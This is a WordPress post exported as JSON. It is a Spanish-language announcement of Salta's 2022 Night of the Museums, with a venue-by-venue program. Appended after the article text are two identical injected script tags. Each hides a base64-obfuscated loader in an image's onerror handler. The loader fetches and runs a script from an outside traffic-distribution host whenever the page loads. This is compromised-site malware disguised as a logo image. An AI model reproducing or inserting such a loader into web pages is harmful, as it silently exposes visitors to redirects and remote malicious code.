{"id":1944,"date":"2022-12-14T11:54:48","date_gmt":"2022-12-14T14:54:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1944"},"modified":"2025-08-14T00:27:58","modified_gmt":"2025-08-14T03:27:58","slug":"salta-de-fiesta-el-sabado-17-sera-la-noche-de-los-museos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1944","title":{"rendered":"Salta de Fiesta: El s\u00e1bado 17 ser\u00e1 La Noche de los Museos"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#890727\"><em>En el marco del ciclo organizado por la Secretar\u00eda de Cultura, 25 museos y espacios culturales de toda la provincia abrir\u00e1n sus puertas, de 18 a 24, con entrada gratuita y diversas actividades.<\/em><\/h4>\n\n\n\n<p>La Noche de los Museos, a lo largo de los a\u00f1os, se ha convertido en una celebraci\u00f3n cultural en la que salte\u00f1os, salte\u00f1as y turistas conocen y se reconocen en estas importantes instituciones guardianas de nuestro patrimonio arqueol\u00f3gico, hist\u00f3rico y art\u00edstico.<\/p>\n\n\n\n<p>Este a\u00f1o no ser\u00e1 la excepci\u00f3n, ya que los museos ofrecen una programaci\u00f3n que invita al disfrute de la familia o de grupos de amigos, con: el anuncio y premiaci\u00f3n de los ganadores del XVII Sal\u00f3n de Artes Visuales en el Museo de Bellas Artes, la inauguraci\u00f3n de la muestra Premios Konex 2022 \u201cSalte\u00f1os con Diplomas al M\u00e9rito\u201d en Explora Salta, un concierto de la Orquesta Infantil y Juvenil en el MAC, la presentaci\u00f3n del Calendario 2022 en el MAAM, m\u00fasica en vivo en la terraza del Antropol\u00f3gico, un recital del Coro Polif\u00f3nico de Salta en el Museo Hist\u00f3rico de la U.N.S.A, visitas guiadas especiales en el Complejo Cultural San Francisco, una feria de arte de peque\u00f1o formato en el Museo de la Ciudad Casa de Hern\u00e1ndez, un desfile y concurso de cosplay en el Museo Quinquela Mart\u00edn de Rosario de la Frontera, una pe\u00f1a en el Museo Hist\u00f3rico Finca Casta\u00f1ares, m\u00fasica en vivo en el Museo de la Vid y el Vino de Cafayate, degustaci\u00f3n de productos regionales en el Museo Arqueol\u00f3gico de Cachi y much\u00edsimas cosas m\u00e1s.<\/p>\n\n\n\n<p>Es importante destacar que La Noche de los Museos es una actividad organizada cada a\u00f1o por la Secretar\u00eda de Cultura de la Provincia, a la que adhieren museos nacionales, municipales y privados de toda nuestra geograf\u00eda, trabajando en equipo en pos de la difusi\u00f3n de sus importantes colecciones y generando espacios vivos de encuentro.<\/p>\n\n\n\n<p>En esta edici\u00f3n, participan museos de: Salta Capital, Rosario de la Frontera, Cafayate, Cachi, Santa Rosa de Tastil, Tartagal, San Antonio de los Cobres, Vaqueros, Campo Santo, Coronel Moldes y Met\u00e1n.<\/p>\n\n\n\n<p><em><strong>Programa<\/strong><\/em>&nbsp;<\/p>\n\n\n\n<p><strong>Salta Capital<\/strong><\/p>\n\n\n\n<p>Museo de Bellas Artes de Salta (Av. Belgrano 992): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>18 hs. Premiaci\u00f3n del Sal\u00f3n Provincial de Arte.<\/p>\n\n\n\n<p>20 hs. Inauguraci\u00f3n del artista Tom\u00e1s Valdivieso en el auditorio.<\/p>\n\n\n\n<p>22 hs. Intervenci\u00f3n musical a cargo de Fernando Subelza.<\/p>\n\n\n\n<p>Museo de Arqueolog\u00eda de Alta Monta\u00f1a \u2013 MAAM (Mitre 77): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>21 hs. Presentaci\u00f3n del calendario 2023 en la Sala Cardones.<\/p>\n\n\n\n<p>Complejo Explora Salta (La Florida 20): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>Food truck de pizzas en el 1\u00ba patio de la Casa Arias Rengel.<\/p>\n\n\n\n<p>A partir de hs. 18: instalaci\u00f3n de parag\u00fcas de colores \u201cBajo un Cielo de Parag\u00fcas\u201d en el 2\u00ba patio de la Casa Arias Rengel.<\/p>\n\n\n\n<p>20 hs. Inauguraci\u00f3n de &nbsp;la muestra Premios Konex 2022 \u201cSalte\u00f1os con Diplomas al M\u00e9rito\u201d<br>Grabado: Esteban Alvarez;, &nbsp;Arte Textil: Guido Yannitto, Dise\u00f1o de Espacio P\u00fablico: CCFGM Arquitectos Asociados (Caron, Castorina, Francesconi, Guel, Macrelli), &nbsp;Dise\u00f1o Industrial: Francisco G\u00f3mez Paz.<br>21 hs: en el patio de la Casa Leguizam\u00f3n presentaci\u00f3n del grupo de m\u00fasicos &nbsp;La Strappata, grupo de tango tradicional con repertorio del tango rom\u00e1ntico. Direcci\u00f3n del maestro Angel Lapadula. Integrantes: Indira Cadar flauta traversa, Lautaro D\u00b4amico bandone\u00f3n, Macarena Zerd\u00e1n y &nbsp;Juan Ignacio S\u00e1enz viol\u00edn, Zoe Jim\u00e9nez segundo viol\u00edn, Bianca Zerda viola, Federico Luna violonchelo y Joaqu\u00edn Sosa contrabajo.<\/p>\n\n\n\n<p>Museo de Arte Contempor\u00e1neo \u2013 MAC (Zuvir\u00eda 90): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>19 hs. Presentaci\u00f3n de la Orquesta Infanto Juvenil de la Provincia con repertorio de &nbsp;m\u00fasica de &nbsp;pel\u00edculas.<\/p>\n\n\n\n<p>Museo G\u00fcemes (Espa\u00f1a 730): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>Presentaci\u00f3n de las actualizaciones de sonorizaci\u00f3n ambiental de la sala \u201cG\u00fcemes: l\u00edder y guerrero\u201d y de la sala \u201cLa tierra en armas\u201d.<\/p>\n\n\n\n<p>Presentaci\u00f3n de la iluminaci\u00f3n sincronizada con el audiovisual de la sala \u201cSalta: escudo de la libertad\u201d.<\/p>\n\n\n\n<p>Museo de Antropolog\u00eda de Salta (Ej\u00e9rcito del Norte y Ricardo Sol\u00e1): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>23 hs. M\u00fasica en vivo en la terraza.<\/p>\n\n\n\n<p>Centro Cultural Am\u00e9rica (Mitre 23): abierto de 18 a &nbsp;24 hs.<\/p>\n\n\n\n<p>19 hs. Presentaci\u00f3n de &nbsp;los talleres anuales en el hall de entrada y escalera:<\/p>\n\n\n\n<p>Prof. Bel\u00e9n Jaramillo: Folklore<\/p>\n\n\n\n<p>Prof. Victor Campillay: Danza y Composici\u00f3n<\/p>\n\n\n\n<p>Prof. Tom\u00e1s Rodr\u00edguez: Ritmos urbanos<\/p>\n\n\n\n<p>Prof. Mariano Guti\u00e9rrez: Dibujo Manga, Dibujo Comic, Dibujo Kids<\/p>\n\n\n\n<p>Prof. Natalia Salibe: Danza Terapia, Performance: Creando Puentes: el objetivo de la misma es generar inclusi\u00f3n del adulto mayor a trav\u00e9s del arte, la danza y el movimiento.<\/p>\n\n\n\n<p>Mercado Artesanal de Salta (Av. San Mart\u00edn 2555): abierto de 10 a 22 horas<\/p>\n\n\n\n<p>De 18 a 22 horas:<\/p>\n\n\n\n<p>Muestra de Artesan\u00edas Tradicionales<\/p>\n\n\n\n<p>Muestra de pinturas, ensambles y objetos \u201cQue florezca la tierra\u201d<\/p>\n\n\n\n<p>Muestra Anual de Talleres<\/p>\n\n\n\n<p>21 horas:<\/p>\n\n\n\n<p>Espect\u00e1culo folcl\u00f3rico y degustaci\u00f3n de vinos<\/p>\n\n\n\n<p>Museo Hist\u00f3rico del Norte \u2013 Cabildo (Caseros 549): abierto de 18 a 23 hs.<\/p>\n\n\n\n<p>Museo \u201cPresidente Jos\u00e9 Evaristo Uriburu\u201d (Caseros 417): abierto de 18 a 23 hs.<\/p>\n\n\n\n<p>Museo San Francisco \u2013 Complejo Cultural San Francisco (C\u00f3rdoba 15): abierto de 18 a 22 hs.<\/p>\n\n\n\n<p>19, 20 y 21 hs. Visitas guiadas a los tres circuitos: Salas de Arte Sacro; Pasadizos; Terraza y Torre. &nbsp;Cupo de 25 personas incluyendo ni\u00f1os.<\/p>\n\n\n\n<p>Museo Hist\u00f3rico de la U.N.Sa. \u201cProf. Eduardo Ashur\u201d (Buenos Aires 177): abierto de 18 a 22 hs.<\/p>\n\n\n\n<p>20:30 hs. Presentaci\u00f3n del Coro Polif\u00f3nico de Salta.<\/p>\n\n\n\n<p>Muestras<\/p>\n\n\n\n<p>La importancia de los f\u00f3siles como patrimonios culturales y el rol de la paleontolog\u00eda en el cambio clim\u00e1tico<\/p>\n\n\n\n<p>3D Una experiencia Hist\u00f3rica<\/p>\n\n\n\n<p>A trav\u00e9s del lente de un aficionado: Juan Antonio Ligoule 1960-1980<\/p>\n\n\n\n<p>Archivo de la memoria trans<\/p>\n\n\n\n<p>Socorro Rosa Salta: activismo transfeminista por el aborto libre y seguro<\/p>\n\n\n\n<p>Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d (La Florida 97): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>19, 21 y 23 hs. Visitas guiadas a cargo de la artista Viviana Ovalle por su muestra homenaje \u201cLa Creaci\u00f3n de Cada D\u00eda\u201d. Obras de distintas \u00e9pocas de su carrera art\u00edstica desde la d\u00e9cada del 80 a la actualidad.<\/p>\n\n\n\n<p>18 a 24 hs. Feria de Arte Peque\u00f1o Formato en el Patio del Museo &nbsp;(se suspende por lluvia) Segunda edici\u00f3n de la Feria de Arte, en esta ocasi\u00f3n con las obras de Alejandra Bertedor Matias Blasco &nbsp;Caroline de Chaunec &nbsp;Jessica Perez, Emilia Quinteros, Sofia Russo, Cecilia Toconas, &nbsp;Javier Torres, Pablo Vas y Diego Villavicencio.<\/p>\n\n\n\n<p>Museo Hist\u00f3rico Policial (Gral. G\u00fcemes 750): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>18 hs. Visita guiada por las diferentes salas con el acompa\u00f1amiento de personajes institucionales.<\/p>\n\n\n\n<p>Se habilitar\u00e1 una sala tem\u00e1tica sorpresa.<\/p>\n\n\n\n<p>20 hs. Presentaci\u00f3n de la Banda Infantil de Polic\u00eda.<\/p>\n\n\n\n<p>Museo de Ciencias Naturales \u201cMiguel Angel Arra\u201d (Mendoza 2): abierto de 16:30 a 20:30 hs.<\/p>\n\n\n\n<p>18 hs. Visita guiada.&nbsp;<\/p>\n\n\n\n<p>Museo Hist\u00f3rico Finca Casta\u00f1ares (Av. Hussay s\/n): abierto de 18 a 22 hs.<\/p>\n\n\n\n<p>\u201cPe\u00f1a en la Casona\u201d, tarde de folklore con la presentaci\u00f3n del Ballet Poncho y Pampa y el Ballet Tierra Gaucha.<\/p>\n\n\n\n<p>Museo Casa-Taller Jorge Hugo Rom\u00e1n (Pje. 1\u00ba Junta 1924 \u2013 altura Jun\u00edn al 650): abierto de 18 de 22 hs.<\/p>\n\n\n\n<p>La casa donde vivi\u00f3 este importante artista de la &nbsp;pl\u00e1stica salte\u00f1a que guarda su multifac\u00e9tica obra.<\/p>\n\n\n\n<p>20 hs. Charla del cineasta Alejandro Arroz \u201cJorge Hugo Rom\u00e1n y Taras Bulba\u201d.<\/p>\n\n\n\n<p><strong>Municipios<\/strong><\/p>\n\n\n\n<p>Museo de la Vid y el Vino (Av. G\u00fcemes Sur y Ferm\u00edn Perdiguero &#8211; Cafayate): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>A partir de &nbsp;las 20 hs. Encendido del \u00c1rbol de Navidad y presentaci\u00f3n del pesebre.<\/p>\n\n\n\n<p>Domingo 18 a hs. 20: El Museo de la Vid y el Vino junto a la Municipalidad de Cafayate invitan a &nbsp;la presentaci\u00f3n de &nbsp;la Orquesta Infanto Juvenil de la Provincia que ejecutar\u00e1 m\u00fasica de &nbsp;pel\u00edculas. Lugar: sobre la calle del Museo.<\/p>\n\n\n\n<p>Museo \u201cQuinquela Mart\u00edn\u201d (San Mart\u00edn 456 \u2013 R\u00ba de la Frontera): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>Inauguraci\u00f3n de la muestra: \u201cSue\u00f1o de Juguetes\u201d, coleccionistas, fabricantes locales, dise\u00f1adores, fabricantes y maquetistas de Salta capital conforman el grupo expositor.<\/p>\n\n\n\n<p>Concurso COSPLAY: confecci\u00f3n, producci\u00f3n y caracterizaci\u00f3n de diversos personajes presentes en el mundo de las historietas, anim\u00e9, pel\u00edculas, series y videojuegos.<\/p>\n\n\n\n<p>Feria con stand de comida &nbsp;japonesa, remeras de comic, artesan\u00edas en zapatillas, impresi\u00f3n 3d Art, comidas saludables.<\/p>\n\n\n\n<p>Puesta en escena del grupo teatral Caleidoscopio con escenas de la serie Stranger Things teatralizadas.<\/p>\n\n\n\n<p>Museo Arqueol\u00f3gico \u201cPio Pablo D\u00edaz\u201d (Juan Calchaqu\u00ed s\/n &#8211; Cachi): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>19:30 hs. Degustaci\u00f3n de bebidas de producci\u00f3n local (cervezas y vinos)<\/p>\n\n\n\n<p>19:30 hs. Degustaci\u00f3n de quesos y pan de producci\u00f3n local<\/p>\n\n\n\n<p>21 y 22:30 hs. Canto de coplas y sikuris<\/p>\n\n\n\n<p>21:30 hs. Presentaci\u00f3n de danzas por parte de ballet de danzas folkl\u00f3ricas local.<\/p>\n\n\n\n<p>Museo de Sitio Tastil &nbsp;(Santa Rosa de Tastil, Ruta Nac. 51 km 103)<\/p>\n\n\n\n<p>Presentaci\u00f3n del pesebre con figuras de arcilla y el \u00e1rbol de Navidad de objetos reciclados realizados por el personal del museo.<\/p>\n\n\n\n<p>Museo Regional Andino (Brigido Zabaleta s\/n \u2013 San Antonio de los Cobres)<\/p>\n\n\n\n<p>11 hs. Visitas Guiadas. Exposici\u00f3n literaria de poetas de San Antonio de los Cobres.<\/p>\n\n\n\n<p>18 hs. Tradicional mateada con hiervas arom\u00e1ticas de la zona.<\/p>\n\n\n\n<p>19 hs. Cine Cultural \u201cCer\u00e1mica Ancestral\u201d realizada por la comunidad del Paraje El Talao.<\/p>\n\n\n\n<p>Visitas Guiadas.<\/p>\n\n\n\n<p>20 hs Fog\u00f3n Art\u00edstico. Actuaci\u00f3n de grupos locales. Poes\u00edas. N\u00fameros Alusivos.<\/p>\n\n\n\n<p>Museo Hist\u00f3rico Municipal \u201cMolino de Piedra\u201d (Av. San Mart\u00edn 2176 esq. Las Zanjas &#8211; Vaqueros): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>Museo de Campo Santo \u201cProf. Osvaldo R. Maidana\u201d (Peatonal Gral. Belgrano s\/n\u00ba-Campo Santo): abierto de 18 a 22 hs.<\/p>\n\n\n\n<p>Visitas guiadas.<\/p>\n\n\n\n<p>Muestra pict\u00f3rica de Jorge y Alberto Klix Cornejo en homenaje a Gertrudis Medeiros, patriota que luch\u00f3 por la Independencia.<\/p>\n\n\n\n<p>Presentaci\u00f3n de academias locales de folclore y la participaci\u00f3n de los Hermanos Figueroa.<\/p>\n\n\n\n<p>Museo Arqueol\u00f3gico y Museo del Tabaco (Finca Santa Anita \u2013 Coronel Moldes): abierto de 18 a 23 hs.<\/p>\n\n\n\n<p>Visitas guiadas.<\/p>\n\n\n\n<p>Museo Municipal de Bellas Artes \u201cProf. Amelio Ronco Ceruti\u201d (9 de Julio esq. G\u00fcemes \u2013 Met\u00e1n): abierto de 18 a 24 hs.<\/p>\n\n\n\n<p>En sala: \u201cM\u00e1s All\u00e1 del Lienzo\u201d, muestra colectiva de &nbsp;pintura decorativa del taller de arte Friditas de la Prof. Lizzi Ru\u00edz.<\/p>\n\n\n\n<p>Exposici\u00f3n de cer\u00e1mica de Magdalena Sierra.<\/p>\n\n\n\n<p>Al aire libre: Exposici\u00f3n de esculturas en hierro del escultor metanense Molina.<\/p>\n\n\n\n<p>Muestra de &nbsp;trabajos de alumnos y profesor en cuero y madera y objetos con botellas de vidrio del taller Integrando Esfuerzos para j\u00f3venes con discapacidad a cargo &nbsp;de Jos\u00e9 Luis Osores.<\/p>\n\n\n\n<p>Muestra de &nbsp;trabajos artesanales en alpaca y bordado en tela de Ana Karina Piorno.<\/p>\n\n\n\n<p>Participaci\u00f3n de la cervecer\u00eda artesanal Soberbia.<\/p>\n\n\n\n<p>Disco pub LIVE.<\/p>\n\n\n\n<p>Disco PRAGA.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-de-fiesta-el-sabado-17-sera-la-noche-de-los-museos-86772\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del ciclo organizado por la Secretar\u00eda de Cultura, 25 museos y espacios culturales de toda la provincia abrir\u00e1n sus puertas, de 18 a 24, con entrada gratuita y diversas actividades. La Noche de los Museos, a lo largo de los a\u00f1os, se ha convertido en una celebraci\u00f3n cultural en la que salte\u00f1os, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1945,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1944","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1944"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1944"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1944\/revisions"}],"predecessor-version":[{"id":7243,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1944\/revisions\/7243"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1945"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1944"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1944"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}